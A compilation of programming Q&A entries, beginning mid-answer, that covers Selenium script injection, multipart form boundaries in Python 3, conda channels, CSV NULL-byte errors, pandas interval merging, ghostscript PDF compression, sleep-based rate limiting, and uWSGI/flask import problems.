However, the error message indicates that Selenium is attempting to run some code in the context of the webpage. For that it injects a `<script>` tag into the webpage and puts the contents of `evaluate.js` into it. Then it waits for that script to set a flag indicating that it is ready - something that never happens of course because scripts aren't running in that webpage. > If yes, what are my options or workarounds? The important question is what Selenium is trying to run there. Your traceback is merely indicating that some code is calling `executeScript()` or `executeAsyncScript()`. I couldn't find any implied calls to either method in the Selenium codebase (at least not in any files related to Firefox web driver). Given that Selenium is open source, you should be able to debug it and add a breakpoint on `org.openqa.selenium.remote.RemoteWebDriver.executeScript()` and `org.openqa.selenium.remote.RemoteWebDriver.executeAsyncScript()` \- that way you will actually see the script being executed there. Alternatively, you can also recompile `RemoteWebDriver.java` and make it produce debugging output. Looking into how these methods are implemented, there might also be another way: telling Selenium that JavaScript is disabled. This should work via capabilities: 'javascriptEnabled': false, According to documentation this capability only works on HTMLUnitDriver, yet Selenium will always consider it and from the source code specifying it for Firefox seems possible. With this capability any calls executing scripts on web pages will fail early.
Where is mimetools.choose_boundary function in Python3? Question: I currently want to use the following piece of code in Python 3, but found that the `mimetools.choose_boundary` function is gone (the whole `mimetools` module was removed in Python 3). How do I change the code to make it work?

    import re
    from urllib.request import urlopen, Request
    import os
    import mimetypes
    import mimetools

    def get_content_type(filepath):
        return mimetypes.guess_type(filepath)[0] or 'application/octet-stream'

    def encode_multipart_formdata(fields, files=[]):
        """
        fields is a sequence of (name, value) elements for regular form fields.
        files is a sequence of (name, filepath) elements for data to be uploaded as files
        Return (content_type, body) ready for httplib.HTTP instance
        """
        BOUNDARY = mimetools.choose_boundary()
        CRLF = '\r\n'
        L = []
        for (key, value) in fields:
            L.append('--' + BOUNDARY)
            L.append('Content-Disposition: form-data; name="%s"' % key)
            L.append('')
            L.append(value)
        for (key, filepath) in files:
            L.append('--' + BOUNDARY)
            L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, os.path.basename(filepath)))
            L.append('Content-Type: %s' % get_content_type(filepath))
            L.append('')
            L.append(open(filepath, 'rb').read())
        L.append('--' + BOUNDARY + '--')
        L.append('')
        body = CRLF.join(L)
        content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
        return content_type, body

Answer: Well, I am answering my own question since no other answer is available here. I did get it working in the end; for more background on the problem, the information below may help.

* * *

### 1. What does the `boundary` do in a `multipart/form-data` request?

To separate the different parts of data in such a request, we use a separator, called the `boundary`, to divide the form data. These parts may be field values _(plain text)_ or uploaded file contents.

### 2. First we put the boundary string in the request header.

To have a request accepted as `multipart/form-data`, we first choose a special string, the `boundary`, and put it in the request header:

    Content-Type: multipart/form-data; boundary=FORM-BOUNDARY

Here we chose `FORM-BOUNDARY` as the boundary string, but in fact we can choose any string we want. Most of the time a long, random string is used to prevent collisions with the payload.

### 3. Use the chosen boundary in the request body.

In the request body _(payload)_ , we separate the data with the `boundary` separator, for example:

    --FORM-BOUNDARY
    Content-Disposition: form-data; name="template"; filename=".xls"
    Content-Type: application/vnd.ms-excel

    A654ADE5^%^#%@%$@ (BINARY DATA IN THIS SECTION)
    --FORM-BOUNDARY
    Content-Disposition: form-data; name="username"

    admin
    --FORM-BOUNDARY
    Content-Disposition: form-data; name="password"

    admin_password
    --FORM-BOUNDARY--

Each form-part starts with a separator line: the `boundary` preceded by `--`. Within a form-part we write headers declaring the content type and the name of the posted field, then a single blank line, then the value (data) of that form-part. After all form-parts, we end the request body with a final separator: the `boundary` wrapped in `--` on both sides.

### 4. So what does `mimetools.choose_boundary` do then?

This function (removed together with `mimetools` in Python 3) simply generates a random boundary in a specific format, see: <https://docs.python.org/2.7/library/mimetools.html?highlight=choose_boundary#mimetools.choose_boundary>

The format is:

    'hostipaddr.uid.pid.timestamp.random'

Just that simple. If we insist on getting the same kind of result:
1. we can write the function ourselves, or
2. we can call the `email.generator` module's `_make_boundary()` function.

But in fact, to make the code above work, there is no need to do either: just generate any sufficiently random string and use it as the boundary!
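For reference, a minimal drop-in replacement sketch for the old `mimetools.choose_boundary()` call. The exact format of the boundary does not matter, only that it is unlikely to collide with the payload; using `uuid` here is just one convenient choice:

    import uuid

    def choose_boundary():
        # any string that is unlikely to appear in the form data will do
        return uuid.uuid4().hex

    # then, inside encode_multipart_formdata():
    # BOUNDARY = choose_boundary()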
Conda doesn't find existent binstar package Question: I'm trying to install the hdf5storage package for my Python 3 installation on a 64-Bit Windows 8 machine using Anaconda. Just to make sure that everything was up to date, I did a C:\Users\Baeuerle>conda install binstar Fetching package metadata: .. Solving package specifications: . Package plan for installation in environment C:\Anaconda3: The following packages will be downloaded: package | build ---------------------------|----------------- binstar-0.9.4 | py34_0 115 KB clyent-0.3.2 | py34_0 13 KB conda-3.7.3 | py34_0 202 KB pytz-2014.9 | py34_0 167 KB requests-2.4.3 | py34_0 607 KB setuptools-7.0 | py34_0 749 KB ------------------------------------------------------------ Total: 1.8 MB The following NEW packages will be INSTALLED: clyent: 0.3.2-py34_0 The following packages will be UPDATED: binstar: 0.7.1-py34_0 --> 0.9.4-py34_0 conda: 3.7.0-py34_0 --> 3.7.3-py34_0 pytz: 2014.7-py34_0 --> 2014.9-py34_0 requests: 2.4.1-py34_0 --> 2.4.3-py34_0 setuptools: 5.8-py34_0 --> 7.0-py34_0 Proceed ([y]/n)? Fetching packages ... binstar-0.9.4- 100% |###############################| Time: 0:00:01 109.73 kB/s clyent-0.3.2-p 100% |###############################| Time: 0:00:00 25.88 kB/s conda-3.7.3-py 100% |###############################| Time: 0:00:05 39.58 kB/s pytz-2014.9-py 100% |###############################| Time: 0:00:00 179.44 kB/s requests-2.4.3 100% |###############################| Time: 0:00:02 210.03 kB/s setuptools-7.0 100% |###############################| Time: 0:01:30 8.45 kB/s setuptools-7.0 100% |###############################| Time: 0:00:03 216.41 kB/s Extracting packages ... [ COMPLETE ] |#################################################| 100% Unlinking packages ... [ COMPLETE ] |#################################################| 100% Linking packages ... [ COMPLETE ] |#################################################| 100% first. Then I did: C:\Users\Baeuerle>binstar show auto/hdf5storage Using binstar api site https://api.binstar.org Name: hdf5storage Summary: https://github.com/frejanordsiek/hdf5storage Access: public Package Types: conda Versions: + 0.1.1 To install this package with conda run: conda install --channel https://conda.binstar.org/auto hdf5storage C:\Users\Baeuerle>conda install --channel https://conda.binstar.org/auto hdf5storage Fetching package metadata: ... Error: No packages found in current win-64 channels matching: hdf5storage You can search for this package on Binstar with binstar search -t conda hdf5storage C:\Users\Baeuerle> So what's the problem here? Obviously the package is there and I used the recommended command. Why can't conda find it then? Is this an 64-bit issue and if so what would be the best way to install hdf5storage through anaconda? Answer: I had the exact same problem with the graph-tool package and the sigcpp dependency. I'm on osx Yosemite 10.10. I wanted to install graph-tool. Found the right package for osX on binstar. conda install --channel https://conda.anaconda.org/vgauthier graph-tool and always had the following message Error: Could not find some dependencies for graph-tool: sigcpp Although sigcpp was already installed conda install sigcpp Fetching package metadata: .......... Solving package specifications: . # All requested packages already installed. 
# packages in environment at /Users/aperrier/anaconda/envs/py34: # sigcpp 2.3.1 2 What ended up working is to add the channel first to conda and then to install sigcpp and graph-tool conda config --add channels https://conda.binstar.org/cyclus conda install sigcpp Was told that the package was already existing. However then graph-tool install worked conda config --add channels https://conda.binstar.org/vgauthier conda install graph-tool And I was able to finally import graph_tool in ipython This makes no sense to me but maybe that will help someone with the same problem.
Regular string of hex values to binary string Question: I am writing a file-data searching script and want to allow the user to search for a string of hex values (via `argv`). I had to switch from PHP to Python because the maximum value of integers is (too) limited on 32-bit PHP/machines. In PHP I could just do:

    $SearchValue = pack('H*', $Input);

However, in Python there does not seem to be any equivalent for this format character. What are some alternatives for this conversion in Python, if any? The output needs to be a binary string (`b'...'`). I am quite new to Python so please bear with me.

Answer:

    3>> import binascii
    3>> binascii.unhexlify('deadbeef')
    b'\xde\xad\xbe\xef'
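On Python 3 the built-in `bytes` type can do the same conversion without an import, and `binascii.hexlify` gives the reverse direction:

    >>> bytes.fromhex('deadbeef')
    b'\xde\xad\xbe\xef'
    >>> import binascii
    >>> binascii.hexlify(b'\xde\xad\xbe\xef')   # the reverse direction
    b'deadbeef'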
"_csv.Error: line contains NULL byte" in CSV reader from STDIN Question: There are many StackOverflow questions about this error when reading from a **_CSV_** file. My problem is occurring while reading from **_STDIN_**. `[Most SO solutions talk about tweaking the open() command which works for opening CSV files - not for reading them through STDIN]. My problem is with reading through STDIN. So please don't mark this as a duplicate.` My python code is: import sys , csv def main(argv): reader = csv.reader(sys.stdin, delimiter=',') for line in reader: print line and the returned error is: Traceback (most recent call last): File "mapper.py", line 19, in <module> main(sys.argv) File "mapper.py", line 4, in main for line in reader: _csv.Error: line contains NULL byte It would suffice me to simply ignore that line where the NULL byte occurs (if that is possible) in the for loop. Answer: i solved it by handling CSV exception import sys , csv def main(argv): reader = csv.reader(sys.stdin, delimiter=',') lineCount = 0 errorCount = 0 while True: # keep iterating indefinitely until exception is raised for end of the reader (an iterator) try: lineCount += 1 line = next(reader) print "%d - %s" % (lineCount , line) except csv.Error: # this exception is raised when a malformed CSV is encountered... ignore it and continue errorCount += 1 continue except StopIteration: # this exception is raised when next() reaches the end of the iterator lineCount -= 1 break print "total line: %d" % lineCount print "total error: %d" % errorCount
Alarm will not be triggered in Python 2.7 program Question: I'm trying to make a command line alarm clock application. The way it's supposed to work is that when the current hour and the current minute are the same as the hour and minute you want to wake up at, it will exit the `while` loop and wake you up. However, when the hour and the minute are the same as the current it just keeps going. I've attempted to google for an answer but I haven't been able to find relevant information. import sys import datetime a = 0 current_time = datetime.datetime.now() print current_time.hour print current_time.minute wakehour = raw_input("When do you wanna wake up?\n What hour? Use the 24-hour clock.\n>>>") wakeminute = raw_input("How many minutes after the hour?\n>>>") print wakehour print wakeminute while a == 0: current_time = datetime.datetime.now() print current_time.hour print current_time.minute if current_time.hour == wakehour and current_time.minute == wakeminute: print 'wakey wakey' a = 1 Answer: When you ask a `raw_input` the result is a string: >>> a=raw_input() 1 >>> type(a) <type 'str'> But `current_time.hour` is an int: >>> current_time = datetime.datetime.now() >>> type(current_time.hour) <type 'int'> So, try to convert `wakehour`/`wakeminute` to int before the conversion with `int(wakehour)`
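For example, a minimal sketch of that fix is to convert the input once, right after reading it (note that `int()` will raise a `ValueError` if the user types something that is not a whole number):

    wakehour = int(raw_input("When do you wanna wake up?\n What hour? Use the 24-hour clock.\n>>>"))
    wakeminute = int(raw_input("How many minutes after the hour?\n>>>"))

    # ... later on, both sides of the comparison are ints, so it can succeed
    if current_time.hour == wakehour and current_time.minute == wakeminute:
        print 'wakey wakey'
        a = 1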
Comparing row values in pandas dataframe Question: I have data in a pandas dataframe where two columns contain numerical sequences (start and stop). I want to identify which rows have stop values which overlap with the next rows' start values. Then I need to concatenate them into a single row so that I only have single none-overlapping numerical sequences represented by my start and stop values in each row. I have loaded my data into a pandas dataframe: > > chr start stop geneID > 0 chr13 32889584 32889814 BRCA2 > 1 chr13 32890536 32890737 BRCA2 > 2 chr13 32893194 32893307 BRCA2 > 3 chr13 32893282 32893400 BRCA2 > 4 chr13 32893363 32893466 BRCA2 > 5 chr13 32899127 32899242 BRCA2 > I want to compare the rows in the dataframe. Check whether the stop value for each row is less than the start value for the following row and then create a row in a new dataframe with the correct start and stop values. Ideally when there are several rows which all overlap this would be concatenated all in one go, however I suspect I will have to iterate over my output until this doesn't happen any more. My code so far can identify whether there is an overlap (adapted from [this post](http://stackoverflow.com/questions/19409335/comparing-pandas-dataframe- rows-dropping-rows-with-overlapping-dates)): import pandas as pd import numpy as np columns = ['chr','start','stop','geneID'] bed = pd.read_table('bedfile.txt',sep='\s',names=['chr','start','stop','geneID'],engine='python') def bed_prepare(inp_bed): inp_bed['next_start'] = inp_bed['start'].shift(periods=-1) inp_bed['distance_to_next'] = inp_bed['next_start'] - inp_bed['stop'] inp_bed['next_region_overlap'] = inp_bed['next_start'] < inp_bed['stop'] intermediate_bed = inp_bed return intermediate_bed And this gives me output like this: print bed_prepare(bed) > > chr start stop geneID next_start distance_to_next > next_region_overlap > 0 chr13 32889584 32889814 BRCA2 32890536 722 > False > 1 chr13 32890536 32890737 BRCA2 32893194 2457 > False > 2 chr13 32893194 32893307 BRCA2 32893282 -25 > True > 3 chr13 32893282 32893400 BRCA2 32893363 -37 > True > 4 chr13 32893363 32893466 BRCA2 32899127 5661 > False > I want to put this intermediate dataframe into the following function in order get the desired output (shown below): new_bed = pd.DataFrame(data=np.zeros((0,len(columns))),columns=columns) def bed_collapse(intermediate_bed, new_bed,columns=columns): for row in bed.itertuples(): output = {} if row[7] == False: # If row doesn't overlap next row, insert into new dataframe unchanged. output_row = list(row[1:5]) if row[7] == True: # For overlapping rows take the chromosome and start coordinate output_row = list(row[1:3]) # Iterate to next row bed.itertuples().next() # Append stop coordinate and geneID output_row.append(row[3]) output_row.append(row[4]) #print output_row for k, v in zip(columns,output_row): otpt[k] = v #print output new_bed = new_bed.append(otpt,ignore_index=True) output_bed = new_bed return output_bed int_bed = bed_prepare(bed) print bed_collapse(int_bed,new_bed) Desired output: > > chr start stop geneID > 0 chr13 32889584 32889814 BRCA2 > 1 chr13 32890536 32890737 BRCA2 > 2 chr13 32893194 32893466 BRCA2 > 5 chr13 32899127 32899242 BRCA2 > However, when I run the function I get my original dataframe back unchanged. I know that the problem is when I try to call bed.itertuples().next(), as this is clearly not quite the right syntax/location for the call. But I don't know the correct way to rectify this. Some pointers would be great. 
SB :)

## Update

This is a [BED file](http://genome.ucsc.edu/FAQ/FAQformat.html#format1) where each row refers to an amplicon (genomic region) with start and stop coordinates. Some of the amplicons overlap; i.e. the start coordinate is before the stop coordinate on the previous row. Therefore I need to identify which rows overlap and concatenate the correct starts and stops so that each row represents an entirely unique amplicon which doesn't overlap any other row.

Answer: I will try to give you some pointers. One pointer is that you want to get the rows based on a Series consisting of booleans that is shifted. Probably you can get a new shifted Series using:

    Boolean_Series = intermediate_bed.loc[:,'next_region_overlap'].shift(periods=1, freq=None, axis=0)

More background about this function: <http://pandas.pydata.org/pandas-docs/dev/generated/pandas.DataFrame.shift.html>

Second pointer is that by using this shifted Series you can get your Dataframe by:

    int_bed = bed.loc[Boolean_Series, :]

More about indexing can be found here: <http://pandas.pydata.org/pandas-docs/dev/indexing.html>

These are only pointers for now; I do not know if this is an actual working solution.
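To make the collapsing step more concrete, here is a small sketch that works directly on the original four columns rather than the intermediate frame. It assumes the rows are already sorted by start within each chromosome (BED files usually are) and it has not been tested on the full data:

    import pandas as pd

    def collapse_overlaps(bed):
        merged = []
        for row in bed.itertuples(index=False):
            chrom, start, stop, gene = row[0], row[1], row[2], row[3]
            if merged and chrom == merged[-1][0] and start <= merged[-1][2]:
                # overlaps the previous amplicon: just extend its stop coordinate
                merged[-1][2] = max(merged[-1][2], stop)
            else:
                merged.append([chrom, start, stop, gene])
        return pd.DataFrame(merged, columns=['chr', 'start', 'stop', 'geneID'])

    new_bed = collapse_overlaps(bed[['chr', 'start', 'stop', 'geneID']])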
Script to compress all pdf files in a directory Question: I wish to compress all pdf files in a directory using ghostscript. I thought of using python to read files and the gs command that compress pdf is from __future__ import print_function import os for path, dirs, files in os.walk("/home/mario/books"): for file in files: if file.endswith(".pdf"): filename = os.path.join(root, file) gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dBATCH -dQUIET -sOutputFile=file filename This gives syntax error at "/screen", For a single file below command works fine gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dBATCH -dQUIET -sOutputFile=output.pdf input.pdf Could someone help me correcting this script or alternate solution? Answer: Thanks for suggestion tdelaney I tried subprocess.call which helped. Below is the code solved the problem. from __future__ import print_function import os import subprocess for root, dirs, files in os.walk("."): for file in files: if file.endswith(".pdf"): filename = os.path.join(root, file) arg1= '-sOutputFile=' +"v"+ file p = subprocess.Popen(['/usr/bin/gs', '-sDEVICE=pdfwrite', '-dCompatibilityLevel=1.4', '-dPDFSETTINGS=/screen', '-dNOPAUSE', '-dBATCH', '-dQUIET', str(arg1), filename], stdout=subprocess.PIPE) print (p.communicate()) Also find ... -exec is good option for shell script though.
Infinite loop - Rubiks cube scrambler Question: I'm having a little problem with Rubiks Cube scrambler in python. There is my code: __author__ = 'Mors' from random import randint moves = ["F", "F'", "R", "R'", "L", "L'", "U", "U'", "D", "D'", "B", "B'", "F2", "R2", "L2", "U2", "D2", "B2"] scramble = [] lenght = len(scramble) lenght_moves = len(moves) - 1 def good_move(scramble, lenght): if scramble[lenght] == "R" or scramble[lenght] == "R'" or scramble[lenght] == "R2": if scramble[lenght - 1] == "R" or scramble[lenght - 1] == "R'" or scramble[lenght - 1] == "R2": return False if scramble[lenght] == "L" or scramble[lenght] == "L'" or scramble[lenght] == "L2": if scramble[lenght - 1] == "L" or scramble[lenght - 1] == "L'" or scramble[lenght - 1] == "L2": return False if scramble[lenght] == "F" or scramble[lenght] == "F'" or scramble[lenght] == "F2": if scramble[lenght - 1] == "F" or scramble[lenght - 1] == "F'" or scramble[lenght - 1] == "F2": return False if scramble[lenght] == "U" or scramble[lenght] == "U'" or scramble[lenght] == "U2": if scramble[lenght - 1] == "U" or scramble[lenght - 1] == "U'" or scramble[lenght - 1] == "U2": return False if scramble[lenght] == "D" or scramble[lenght] == "D'" or scramble[lenght] == "D2": if scramble[lenght - 1] == "D" or scramble[lenght - 1] == "D'" or scramble[lenght - 1] == "D2": return False if scramble[lenght] == "B" or scramble[lenght] == "B'" or scramble[lenght] == "B2": if scramble[lenght - 1] == "B" or scramble[lenght - 1] == "B'" or scramble[lenght - 1] == "B2": return False return True while (lenght < 20): print (lenght) print (scramble) random = randint(0, lenght_moves) if lenght - 1 >= 1: if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) != False: random = randint(0, lenght_moves) print (random) scramble.remove(lenght - 1) scramble.append(moves[random]) else: scramble.append(moves[random]) else: scramble.append(moves[random]) lenght = len(scramble) print (scramble) So, when I'm running my program, he is going to if lenght - 1 >= 1: if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) != False: random = randint(0, lenght_moves) print (random) scramble.remove(lenght - 1) scramble.append(moves[random]) And he is looping up... I tried with "i" instead of "length - 1" but it didn't work (index out of range etc.). 
moves = ["F", "F'", "R", "R'", "L", "L'", "U", "U'", "D", "D'", "B", "B'", "F2", "R2", "L2", "U2", "D2", "B2"] scramble = [] length = len(scramble) length_moves = len(moves) - 1 def good_move(scramble, length): if scramble[length] == "R" or scramble[length] == "R'" or scramble[length] == "R2": if scramble[length - 1] == "R" or scramble[length - 1] == "R'" or scramble[length - 1] == "R2": return False if scramble[length] == "L" or scramble[length] == "L'" or scramble[length] == "L2": if scramble[length - 1] == "L" or scramble[length - 1] == "L'" or scramble[length - 1] == "L2": return False if scramble[length] == "F" or scramble[length] == "F'" or scramble[length] == "F2": if scramble[length - 1] == "F" or scramble[length - 1] == "F'" or scramble[length - 1] == "F2": return False if scramble[length] == "U" or scramble[length] == "U'" or scramble[length] == "U2": if scramble[length - 1] == "U" or scramble[length - 1] == "U'" or scramble[length - 1] == "U2": return False if scramble[length] == "D" or scramble[length] == "D'" or scramble[length] == "D2": if scramble[length - 1] == "D" or scramble[length - 1] == "D'" or scramble[length - 1] == "D2": return False if scramble[length] == "B" or scramble[length] == "B'" or scramble[length] == "B2": if scramble[length - 1] == "B" or scramble[length - 1] == "B'" or scramble[length - 1] == "B2": return False return True i = 0 while (i < 20): print (length) print (scramble) random = randint(0, length_moves) if i >= 2: if good_move(scramble, i) == False: print ("I'm here") while (good_move(scramble, i)) != False: random = randint(0, length_moves) print (random) scramble.remove(i) scramble.append(moves[random]) else: scramble.append(moves[random]) else: scramble.append(moves[random]) i += 1 print (scramble) For example, in second code i put "i" insted of lenght and when my program is meeting function, he is telling that "index is out of range" I don't know why, if i >= 2 it can't be out of range because "lenght"(in function) == 1,2,3 and so on and "lenght - 1" == 0,1,2. Any ideas how to solve this problem? BTW. For example correct scramble to Rubiks Cube: R2 U2 R2 B' U2 B2 R2 F' U2 L' B2 F2 U' F2 R' B D R B R' **Be careful! If u run this code, your computer will get lag (infinite loop)** Answer: if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) != False: This is the first problem. The `while` loop will never be entered here, because `good_move` will certainly be false when you reach the `print` line. Perhaps you meant to have the same condition each time. if good_move(scramble, lenght - 1) == False: print ("I'm here") while (good_move(scramble, lenght - 1)) == False: * * * scramble.remove(lenght - 1) This is the second problem. `list.remove(x)` does not remove `list[x]` from the list. It searches through the list for the first instance of x and removes it, no matter where it is. If you want to remove the last element of the list, you can slice it off. scramble = scramble[:-1] Or delete it. del scramble[-1] * * * Now your program should end properly. Sample result: ["F'", 'D', 'B', 'D', 'B2', "U'", 'R2', 'L2', "D'", 'B2', 'F', "R'", 'B2', 'R', "F'", "R'", "B'", 'U2', 'F', 'L2']
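Putting the two fixes together, here is a compact sketch of the whole scramble loop. It uses the same move table and just compares the face letter (the first character of each move), so the "no two consecutive moves on the same face" check stays short:

    from random import choice

    moves = ["F", "F'", "R", "R'", "L", "L'", "U", "U'", "D", "D'",
             "B", "B'", "F2", "R2", "L2", "U2", "D2", "B2"]

    scramble = []
    while len(scramble) < 20:
        move = choice(moves)
        # same face as the previous move? pick again
        if scramble and move[0] == scramble[-1][0]:
            continue
        scramble.append(move)

    print (' '.join(scramble))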
How do we use sleep() in Linux to keep our CPU usage reasonable while still having decent timing accuracy? Question: # The Problem I'm trying to test a system that uses UDP packets to communicate at a predetermined rate. I want to be able to test this system using a Python test harness with a set packet rate. Sample rates might be 20 packets/sec, or 4500 packets/sec, etc. In some simple tests I've determined that my Windows machine can pass upwards of 150,000 UDP packets per second over localhost, so I can treat that as an upper limit for the sake of the experiment. Let's start with this shell structure to create a rate limiter. This code is inspired mostly by code in [this thread](http://stackoverflow.com/questions/667508/whats-a-good-rate-limiting- algorithm). ## Approach 1 import time, timeit class RateLimiter: def __init__(self, rate_limit): self.min_interval = 1.0 / float(rate_limit) self.last_time_called = None def execute(self, func, *args, **kwargs): if self.last_time_called is not None: # Sleep until we should wake up while True: now = timeit.default_timer() elapsed = now - self.last_time_called left_to_wait = self.min_interval - elapsed if left_to_wait <= 0: break time.sleep(left_to_wait) self.last_time_called = timeit.default_timer() return func(*args, **kwargs) You can use this helper class like so: self._limiter = RateLimiter(4500) # 4500 executions/sec while True: self._limiter.execute(do_stuff, param1, param2) The call to `timeit.default_timer()` is a shortcut in Python that gives you the highest accuracy timer for your platform, lending an accuracy of about 1e-6 seconds on both Windows and Linux, which we will need. ### Performance of Approach 1 In this approach, `sleep()` can buy you time without eating CPU cycles, but it can hurt the accuracy of your delay. [This comment](http://stackoverflow.com/a/15967564/31707) shows the differences between Windows and Linux regarding `sleep()` for periods less than 10ms. In summary of that comment, Windows' `sleep()` only works for values of 1ms or more (any less is regarded as zero) but generally sleeps for _less_ than the requested sleep time, while in Linux `sleep()` is more precise but generally sleeps for slightly _more_ than the requested time. The code above is accurate on my Windows machine, but is inefficient for faster rates. When I requested a rate of 4500 packets/sec in my tests, I got a median of 4466 packets/sec (0.75% error). _However_ , for rates faster than 1000Hz, the calls to `sleep()` take zero time, so the RateLimiter burns CPU cycles until exceeding the wait time. Unfortunately we have no other choice since we can't use non-zero sleep times less than 1ms in Windows. In Linux, the calls to `sleep()` took longer than requested, yielding a median of 3470 packets/sec (22.8% error). While `sleep()` in Linux takes longer than desired, requesting higher rates like 6000Hz yields a true rate higher than 4500, so we know that it's capable of the goal rate. The problem is in our `sleep()` value, which must be corrected to be lower than we might have expected. I performed another test, using the following (bad) approach. ## Approach 2 In this approach, we never sleep. 
We chew up CPU cycles until the time elapses, which leads Python to use 100% of the core it's running on: def execute(self, func, *args, **kwargs): if self.last_time_called is not None: # Sleep until we should wake up while True: now = timeit.default_timer() elapsed = now - self.last_time_called left_to_wait = self.min_interval - elapsed if left_to_wait <= 0: break # (sleep removed from here) self.last_time_called = timeit.default_timer() return func(*args, **kwargs) ### Performance of Approach 2 In Linux, this yields a median rate of 4488 packets/sec (0.26% error), which is on par with Windows but eats the CPU the same way, so it's really inefficient. # The Question Here's what I'm getting at. **How do we use`sleep()` in Linux to keep our CPU usage reasonable while still having decent timing accuracy?** I figure this would have to involve some sort of monitoring and compensation process but I'm not really sure how to go about implementing such a thing. Is there a standard way to approach this kind of error-correction problem? Answer: The only way to guarantee this is to use real-time OS scheduling. Otherwise, you are at the scheduler's mercy and could be preempted at any time (e.g. if there is some high-priority/low-nice process eating your CPU cycles). Indeed, `sleep()` is just a convenient way to ask for a preemption of a specific duration. It's always possible you will sleep for substantially longer than you ask. This is why Windows does not even try to sleep for <1ms; it isn't capable of that level of precision once you factor in scheduler nondeterminism. Out of the box, Linux isn't either, but it can be configured (via [`sched_setscheduler(2)`](http://linux.die.net/man/2/sched_setscheduler)) to be real-time, so it will make the attempt if you ask.
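That said, a common compromise that keeps CPU usage low without real-time scheduling is to sleep for most of the interval and busy-wait only for the last millisecond or so. This is just a sketch of a drop-in replacement for the `execute` method from Approach 1, and it is still at the scheduler's mercy:

    def execute(self, func, *args, **kwargs):
        if self.last_time_called is not None:
            while True:
                elapsed = timeit.default_timer() - self.last_time_called
                left_to_wait = self.min_interval - elapsed
                if left_to_wait <= 0:
                    break
                if left_to_wait > 0.001:
                    # sleep slightly less than needed; the final spin absorbs
                    # whatever error the scheduler introduces
                    time.sleep(left_to_wait - 0.001)
                # otherwise fall through and busy-wait for the last ~1 ms
        self.last_time_called = timeit.default_timer()
        return func(*args, **kwargs)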
GAE SDK 1.9.5 and an InvalidCertificateException Question: Trying to import testbed from GAE SDK 1.9.5 with Python 2.7.8 on OS X Mavericks 10.9.5, and I'm getting an InvalidCertificateException error.

    from google.appengine.ext import testbed
      File "/usr/local/google_appengine/google/appengine/ext/testbed/__init__.py", line 120, in <module>
        from google.appengine.api import urlfetch_stub
      File "/usr/local/google_appengine/google/appengine/api/urlfetch_stub.py", line 34, in <module>
        _fancy_urllib_InvalidCertException = fancy_urllib.InvalidCertificateException
    AttributeError: 'module' object has no attribute 'InvalidCertificateException'

I looked at the fancy_urllib module and the InvalidCertificateException class is there, so I don't understand why it's not importing. Apparently others have had the same error, so I attempted to correct it by deleting: **urlfetch_cacerts.txt** AND **cacerts.txt** from:

    GoogleAppEngineLauncher/Contents/Resources/GoogleAppEngineDefault.bundle/Contents/Resources/google_appengine/lib/cacerts/

Answer: Apparently the GAE installer creates a nested directory. This was fixed by copying the contents over:

    cd /usr/local/google_appengine/lib
    cp fancy_urllib/fancy_urllib/__init__.py fancy_urllib/__init__.py

This is how the module was incorrectly structured; there are two `__init__.py` files:

    /usr/local/google_appengine/lib/fancy_urllib/__init__.py  # this file is empty
    /usr/local/google_appengine/lib/fancy_urllib/fancy_urllib/__init__.py # this file contains the functions.

FIXED THE ERROR
How to import one day old logs Question: I am new to Python and need some help in being able to import one day old logs. Below is the script I have come up with, but I am not sure whether it works or if there is a better way to do this.

    def fileCreation(path):
       now = time.time()
       oneday_ago = now - (24*60*60) ## seconds in 1 day
    if fileCreation < oneday_ago:
       print f
       getAuditRecords(f)

I have a script that imports the whole database from mid June 2014, but I only need to get day-old logs. Here is a sample of the logs I am trying to import

> /mnt/hcp1/R1P/R1P_ora_982_2.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_20_1.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_29962_1.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_15593_2.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_9946_1.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_10746_1.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_6508_1.xml.201409070400
> /mnt/hcp1/R1P/R1P_ora_17340_2.xml.201409070400
> /mnt/hcp1/SCC/SCC_ora_18881_2.xml.201407090400

Answer: Regarding the "two days ago" part, you should use `datetime.datetime` and `datetime.timedelta`. E.g.

    import datetime
    now = datetime.datetime.now()
    two_days = datetime.timedelta(days=2)
    two_days_ago = now - two_days
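For the file-selection part itself, here is a small sketch. The directory path is just the one from the sample above, and it assumes the files' modification times track when the logs were written (if the date is only encoded in the filename suffix, you would parse that instead):

    import os, time

    LOG_DIR = '/mnt/hcp1/R1P'   # directory from the sample above

    def is_recent(path, max_age_seconds=24*60*60):
        # getmtime returns seconds since the epoch, same unit as time.time()
        return time.time() - os.path.getmtime(path) < max_age_seconds

    recent_logs = [os.path.join(LOG_DIR, f) for f in os.listdir(LOG_DIR)
                   if is_recent(os.path.join(LOG_DIR, f))]
    print recent_logs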
No module named flask while running uWSGI Question: I have a very simple flask app (myflaskapp.py): from flask import Flask app = Flask(__name__) @app.route('/') def index(): return "<span style='color:red'>I am app 1</span>" If I run: uwsgi --http-socket :3031 --plugin python --wsgi-file myflaskapp.py --callable app I get the following output: Traceback (most recent call last): File "myflaskapp.py", line 1, in <module> from flask import Flask ImportError: No module named flask unable to load app 0 (mountpoint='') (callable not found or import error) *** no app loaded. going in full dynamic mode *** and I don't understand why. I have flask installed (pip install flask). If I run ipython and import flask it also works there. Any ideas? Thanks! Answer: In the end what worked for me was adding -H /path/to/virtualenv to the uWSGI command: uwsgi --http-socket :3031 --plugin python --wsgi-file myflaskapp.py --callable app -H /path/to/virtualenv I also had different Python versions in the virtualenv and for uWSGI. I'm still investigating if this could cause any problems.
